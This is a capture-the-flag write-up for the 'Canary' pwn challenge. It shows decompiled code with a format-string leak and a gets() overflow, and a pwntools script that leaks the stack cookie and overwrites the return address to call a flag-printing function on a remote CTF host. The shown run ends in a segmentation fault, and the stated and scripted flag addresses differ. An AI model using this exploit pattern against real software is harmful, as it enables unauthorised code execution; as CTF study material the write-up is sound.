# Canary (261 solves)
Simple pwn challenge, requires leaking cookie with format sting vulnerability and overwriting ret address with buffer overflow.
The binary contains **flag** function at **0x400798** which we have to call to get the flag.
int flag()
return system("/bin/cat flag.txt");
void greet()
char format;
char v1;
unsigned long long v2;
cookie = __readfsqword(0x28u);
printf("Hi! What's your name? ");
printf("Nice to meet you, ");
strcat(&format, "!\n");
printf(&format); // leak cookie
printf("Anything else you want to tell me? ");
gets(&v1;; // overwrite ret
from pwn import *
import re
def leak(r):
payload = b''
payload += b'%17$llx'
r.sendlineafter('name? ', payload)
raw = r.recvuntil('Anything')
cookie = re.findall('you, (.*)!\n', raw.decode())[0]
return int(cookie, 16)
if __name__ == "__main__":
flag = 0x400787
r = remote('shell.actf.co', 20701)
c = leak(r)
payload = b''
payload += b'A' * 56 # padding
payload += p64(c) # cookie
payload += b'B' * 8 # padding
payload += p64(flag) # print flag
r.sendlineafter('tell me?', payload)
$ python3 solve.py
[+] Opening connection to shell.actf.co on port 20701: Done
[*] Switching to interactive mode
Segmentation fault